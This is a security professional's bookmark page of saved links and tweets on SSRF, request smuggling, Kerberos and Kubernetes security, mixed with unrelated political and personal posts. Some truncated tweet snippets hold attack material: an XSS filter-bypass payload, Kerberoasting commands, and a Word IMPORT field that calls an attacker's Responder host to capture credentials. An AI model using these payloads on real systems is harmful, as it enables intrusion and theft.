recentpopularlog in
« earlier  
SSRF in the Wild - The Startup - Medium
When looking for SSRF vulnerabilities, file upload URLs, proxies and webhooks are good places to start. But also pay attention to the SSRF entry points that are less obvious: URLs embedded in files that are processed by the application, hidden API endpoints that accept URLs as input, and HTML tag injections.
ssrf  pentest  webapp 
22 hours ago
Forseti Security / About
Forseti Security is a collection of community-driven, open-source tools to help you improve the security of your Google Cloud Platform (GCP) environments. Forseti consists of core modules that you can enable, configure, and execute independently of each other. Community contributors are also developing add-on modules to offer unique capabilities. Forseti’s core modules work together, and provide a foundation that others can build upon.
forseti  gcp  cloud  security 
23 hours ago
Twitter
I really wish Cisco and Juniper would stop doing this stuff, accidentally or otherwise.
yesterday
Twitter
pulse secure directory traversal bug explained-

/dana-na/ <- "na" means "no authentication", urls not starting wit…
yesterday
Neo23x0/sigma: Generic Signature Format for SIEM Systems
Sigma is a generic and open signature format that allows you to describe relevant log events in a straight forward manner. The rule format is very flexible, easy to write and applicable to any type of log file. The main purpose of this project is to provide a structured form in which researchers or analysts can describe their once developed detection methods and make them shareable with others.
analytics  security  siem 
yesterday
Hinodeya, a Japanese ramen shop with a 134-year history, opens in Dallas on Wednesday | GuideLive
Back in June, we told you about a wave of groundbreaking ramen that was about to hit Dallas. Now one of the most exciting new noodle shops is opening on Greenville Avenue.
dallas  restaurants 
yesterday
Twitter
ModSecurity {" XSS "} ~Bypass braindeath; ⓾

~1; " %3Cspyerror%20script%20goes%20here%3E=%0AByPass "
~2; "%3Cscript…
2 days ago
Making an antivirus engine : Guidelines - Adlice Software
Favorite tweet:

Making an antivirus engine : the guidelineshttps://t.co/xDHuehCETC

Very useful reference to understand basic AV internals!

— Cn33liz (@Cneelis) August 21, 2019
antivirus  c++  windows 
2 days ago
Twitter
As YouTube videos go, this is a great one. It's called "Preventing the Collapse of Civilization" and it's partiall…
2 days ago
Twitter
RT : I have commandeered
the GPUs
that are on
the shared server

and which
you were probably
saving
for your experiment…
2 days ago
Twitter
Okay, Wordpress and `chmod 777`, which were big issues in 2009, seem to still be big issues in 2019.

I've never s…
2 days ago
Twitter
Even worse: the class is reactionary hippie BS against Silicon Valley instead of corporate BS, causing students to…
3 days ago
Twitter
My inner cynic says: Whose ethics would be taught? Who hires, or refuses to hire, the graduates?

Welcome to Stanf…
3 days ago
Twitter
I guess you'd have to stop somewhere around where the opponent did. A sizable gap at any level wo…
3 days ago
Twitter
RT : Mad respect for Cathay Pacific CEO Rupert Hogg.
3 days ago
Twitter
Game theory. If you have enough to destroy the world once and the adversary has far more they mig…
3 days ago
Twitter
Point is still surviving a massive first strike with enough to hit back. Or rather deterring that…
3 days ago
Twitter
Oof, looks like I'll be publishing a Metasploit module for pulse secure sooner than expected since some people ment…
3 days ago
Twitter
The best representation of technical analysis I've had the pleasure to study.
4 days ago
Twitter
RT : Paged Out! is out! (and it's free to download!)

There are 57 articles in 12 categories:…
4 days ago
Twitter
It sounds like something I'd say. Performative anything is trash, but especially this. Even in Texas I'…
4 days ago
Twitter
It might have been who once said something about people who insist on performative open-carry eventually aff…
4 days ago
Security - Kubernetes
As you can see from the above figure, each one of the 4C’s depend on the security of the squares in which they fit. It is nearly impossibly to safeguard against poor security standards in Cloud, Containers, and Code by only addressing security at the code level. However, when these areas are dealt with appropriately, then adding security to your code augments an already strong base. These areas of concern will now be described in more detail below.
kubernetes  security 
4 days ago
vmware/octant: A web-based, highly extensible platform for developers to better understand the complexity of Kubernetes clusters.
Octant is a tool for developers to understand how applications run on a Kubernetes cluster. It aims to be part of the developer's toolkit for gaining insight and approaching complexity found in Kubernetes. Octant offers a combination of introspective tooling, cluster navigation, and object management along with a plugin system to further extend its capabilities.
kubernetes  devops  tools 
4 days ago
HTTP Desync Attacks: Request Smuggling Reborn | Blog - PortSwigger
HTTP requests are traditionally viewed as isolated, standalone entities. In this paper, I'll explore forgotten techniques for remote, unauthenticated attackers to smash through this isolation and splice their requests into others, through which I was able to play puppeteer with the web infrastructure of numerous commercial and military systems, rain exploits on their visitors, and harvest over $70k in bug bounties.
webapp  pentest  security  http  requestsmuggling 
4 days ago
HTTP Request Smuggler - PortSwigger
This is an extension for Burp Suite designed to help you launch HTTP Request Smuggling attacks. It supports scanning for Request Smuggling vulnerabilities, and also aids exploitation by handling cumbersome offset-tweaking for you.
burp  requestsmuggling  webapp  pentest 
4 days ago
Twitter
The only two real people on Twitter are me and you. And I'm not sure about you. Or me.
4 days ago
Twitter
There are many paths to totalitarianism. One is being such a hydrophobic dillhole that your friends and neighbors…
4 days ago
Twitter
There's a whole secretive world of digital espionage and spy vs. spy going on constantly. Check out "Information W…
5 days ago
Twitter
How To Attack Kerberos 101

Get-DomainSPNTicket -SPN <spn> -OutputFormat hashcat -Credential $cred

hashcat64.exe -…
5 days ago
Twitter
Any Debian based distro is fine unless you're really used to RedHat, in which case CentOS. Fedora is cool…
5 days ago
Twitter
A number of people were invested in my Twitter interview process. I wrote a blog post about it that is a little mor…
6 days ago
Twitter
RT : This is amazing propaganda. Chinese state media produced a rap video (in English, so it’s targeted at the West)...…
6 days ago
Twitter
Implicitly comparing Hong Kong protesters to Nazis is a bold move by the Chicoms, Cotton. Let's see if that pays o…
6 days ago
Twitter
Fair warning, if you start studying information warfare you will
Need to learn a lot of sociology, anthropology, hi…
6 days ago
Twitter
If you don't have a subscription to the Athletic, sign up for the free trial for this. Even if you hate the sports…
7 days ago
MITRE Systems Engineering Guide
Collected wisdom from MITRE’s systems engineering experts
mitre  systems 
7 days ago
Twitter
RT : I need advice. Found subdomain takeover in a large company. Submitted a bug bounty showing ACTIVE spoofing of their…
8 days ago
Twitter
This is true even without any context whatsoever.
8 days ago
Twitter
Had some Haunted Ghost Pepper chips today. I like spicy food and those are the first commercial snacks…
8 days ago
Twitter
So I, a person with 500 Twitter followers, pointed out that one account had more followers than another and got 177…
9 days ago
Twitter
If you're an internal pen tester, see if you can get your psychopath CEO to pitch in on your next social engineerin…
9 days ago
Twitter
This Epstein autopsy thing reminds me of that old joke about the policeman in the witness box... "He called me a pi…
9 days ago
Twitter
About 36 MINUTES away from starting the OSCP Exam... Couldn't be more hyped. Feeling confident.
9 days ago
Twitter
: for those of you pentesting large companies, make sure to check their internal source control repos (Githu…
9 days ago
(429) https://twitter.com/i/web/status/1161468039679885312
IANAL, but I believe the magic words to use with HR are "Equal Pay Act of 1963", which is a law most Americans…
10 days ago
(429) https://twitter.com/i/web/status/1161429419946328065
RT : CVE-2019-1211 Git for Visual Studio Elevation of Privilege Vulnerability. I discovered this while looking for an un…
10 days ago
Twitter
RT : I am finding that criticizing the following corporations will get you attacked by online trolls in increasing order…
10 days ago
Twitter
Submitted this to MSRC, won't patch, it's a "feature"; Open Word -> CTRL + F9 -> IMPORT "\\\\Responder-IP\\1.jpg" -…
10 days ago
Twitter
I don't see being annoyed by it, much less blocking you. You have to do what feels right…
11 days ago
Twitter
RT : There are 5985 AWS privileges. 2505 (42%) have no condition restrictions possible (other than the global conditions…
11 days ago
Twitter
That's fair, but it's still worth noting that hate crimes are below, say, the 2009 leve…
11 days ago
Twitter
I don't know if my brain is going to be able to handle the "Justice Department suddenly 'uncovers' problems at fede…
11 days ago
Twitter
I will say that Patrick can hardly be blamed for not knowing how far America's violent…
11 days ago
Twitter
That said, numbers aren't everything, and there certainly is considerable shitbaggery t…
11 days ago
Twitter
Page 7 of this report. Hate crime statitstics aren't perfect but they have ticked up w…
12 days ago
Twitter
About a nanosecond after this article was published Uber announced that they are freezing engineering hires. Reall…
12 days ago
CEOs Who Cheat on Spouse Twice as Likely to Cheat at Work: Study - Bloomberg
Cheating on your spouse goes hand in hand with cheating in the workplace.
ethics  adultery  sociology 
12 days ago
Master plan of the universe revealed in new galaxy maps
In these vivid 3D maps, which Tully call “Cosmicflows,” the universe takes on a startlingly new appearance. You won’t find our solar system or any familiar stars. You won’t even find our home galaxy, the Milky Way. The scale is so vast that entire galaxies shrink to dots, blend together and vanish into the bigger picture, like pixels on a computer screen.

What pops out at the end is nothing less than the master plan of the universe, seen across nearly a billion light-years. It contains a physical record of everything that has happened in our part of the universe since the time of the Big Bang.
astronomy  science 
12 days ago
Twitter
Meet the Ministry of Literature!
Do you have what it takes to be judged by these ladies?…
14 days ago
LAN-Based Blind SSRF Attack Primitive for Windows Systems (switcheroo) – initblog.com
Unauthenticated attackers on a local network can force stock Windows systems to perform arbitrary HTTP GET requests, including to the target’s localhost interface. No user interaction is required. No IIS installation is required. Network Discovery must be enabled to trigger the exploit (usually on by default for private networks). The response cannot be viewed by the attacker, making this a “Blind Server-Side Request Forgery” vulnerability.
ssrf  ssdp  windows  exploit 
14 days ago
Gone to the Dogs | Shenanigans Labs
Just in time for our DEF CON workshop “Constructing Kerberos Attacks with Delegation Primitives”, Microsoft failed to meet the disclosure deadline, and so we publish another primitive that can be abused to achieve Windows Local Privilege Escalation (LPE). It affects all domain-joined Windows 10 hosts by default, as well as Windows Server 2016 and Windows Server 2019 that have the WebDAV Redirector feature installed.
activedirectory  pentest  privilegeescalation 
14 days ago
Twitter
Now it’s time to start getting our game up. Remember I said that we’d be getting back to the “what” of hacking? Wel…
14 days ago
Don’t Underestimate Grep Based Code Scanning
Below is the starter pack of rules. Some rules are clearly more noisy than others — people can pick and choose the ones they want to focus on.
grep  staticanalysis  security  code 
14 days ago
Twitter
If you aren't in Vegas and miss that chill room music.
15 days ago
Twitter
I'm listening to it while I work. I've always appreciated that provides…
15 days ago
Twitter
The slides and videos from our workshop on Active Directory attacks are now online! Access the deck and vide…
15 days ago
Twitter
I get that anybody can sue anybody for anything and it's expensive, but if I'm a Texas gun manufacturer I…
15 days ago
Twitter
Does that reduce the supply of guns? 34 states have their own variants of the PLCAA, including Texas and…
15 days ago
Twitter
We would like to extend our sincere and heartfelt thanks to our Champion, Dr. Zena Jackson, and to everyone at…
15 days ago
Twitter
I want to know what we millennials have messed up now but I can't figure out this chart.
15 days ago
Twitter
The difference between guns and tobacco would seem to be that tobacco goes stale. If you want to sell ci…
15 days ago
Twitter
The big rush towards making blue/defense a core component of all training classes there seems to be a gap in the mo…
16 days ago
Penetration Tester at State Farm
RT : Looking for pentesters in the Dallas area! Wonderfully skilled team that I’m proud to be a part of. Come join us!
16 days ago
Twitter
RT : FBI gave a preso at once. I got a lot of flak for that from the community. It didn'…
16 days ago
« earlier      
per page:    204080120160

Copy this bookmark:





to read